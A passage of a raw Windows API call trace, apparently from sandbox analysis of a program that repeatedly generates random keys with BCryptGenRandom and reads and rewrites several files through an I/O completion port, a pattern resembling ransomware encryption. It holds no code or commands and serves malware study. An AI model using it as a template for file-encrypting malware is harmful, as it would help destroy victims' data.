(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.252] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.252] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.252] free (_Block=0x1ff1e60) [0080.252] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.252] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.252] free (_Block=0x1ff1e60) [0080.252] free (_Block=0x1ff1930) [0080.253] free (_Block=0x77d800) [0080.253] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.254] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.272] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x5c9f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.274] CloseHandle (hObject=0x3ac) returned 1 [0080.332] free (_Block=0x1fb18c0) [0080.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.335] CloseHandle (hObject=0x3ac) returned 1 [0080.335] free (_Block=0x1fb18c0) [0080.335] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.340] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.434] CloseHandle (hObject=0x3a0) returned 1 [0080.434] free (_Block=0x1fb18c0) [0080.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.441] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.442] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.442] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.442] free (_Block=0x1ff1e60) [0080.442] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.442] calloc (_Count=0x82, _Size=0x4) returned 0x3db00b8 [0080.443] free (_Block=0x1ff1e60) [0080.443] free (_Block=0x3db00b8) [0080.443] free (_Block=0x77d800) [0080.443] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0080.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.457] CloseHandle (hObject=0x3ac) returned 1 [0080.457] free (_Block=0x3d70048) [0080.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.465] CloseHandle (hObject=0x3c0) returned 1 [0080.466] free (_Block=0x3df0008) [0080.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.477] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.478] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.478] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.478] free (_Block=0x1ff1e60) [0080.478] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.478] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.479] free (_Block=0x1ff1e60) [0080.479] free (_Block=0x1ff1930) [0080.479] free (_Block=0x77d800) [0080.479] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.486] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0080.486] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0080.486] free (_Block=0x1ff1e60) [0080.486] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0080.486] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0080.487] free (_Block=0x1ff1e60) [0080.487] free (_Block=0x1ff1930) [0080.487] free (_Block=0x77d800) [0080.487] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0080.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.515] CloseHandle (hObject=0x3c4) returned 1 [0080.515] free (_Block=0x1ff1e60) [0080.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.532] CloseHandle (hObject=0x3c0) returned 1 [0080.543] free (_Block=0x3df0008) [0080.543] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.550] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.550] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.551] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.551] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.603] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x11d3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.631] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.641] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.641] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.641] free (_Block=0x77d800) [0080.641] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.641] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.641] free (_Block=0x1ff1930) [0080.641] free (_Block=0x1ff1a40) [0080.641] free (_Block=0x77d908) [0080.641] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.666] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x6794, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.706] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.725] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.738] CloseHandle (hObject=0x3a0) returned 1 [0080.738] free (_Block=0x1ff1e60) [0080.738] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.739] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.851] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0080.859] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0080.860] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.860] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.860] free (_Block=0x77d800) [0080.860] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.860] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.860] free (_Block=0x1ff1930) [0080.860] free (_Block=0x1ff1a40) [0080.860] free (_Block=0x77d908) [0080.860] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.888] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.898] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.911] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.926] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x75ba, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0080.948] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1278, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0081.939] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x2f9a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0081.967] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2a90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0081.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0081.988] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x2810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0081.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.013] WriteFile (in: hFile=0x3bc, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.023] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb53, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.037] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2a88, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.045] CloseHandle (hObject=0x3c4) returned 1 [0082.047] free (_Block=0x1ff1e60) [0082.050] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0082.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0082.100] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0082.100] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0082.100] free (_Block=0x1ff1e60) [0082.100] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0082.100] calloc (_Count=0x82, _Size=0x4) returned 0x3db00b8 [0082.101] free (_Block=0x1ff1e60) [0082.101] free (_Block=0x3db00b8) [0082.101] free (_Block=0x77d800) [0082.101] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, 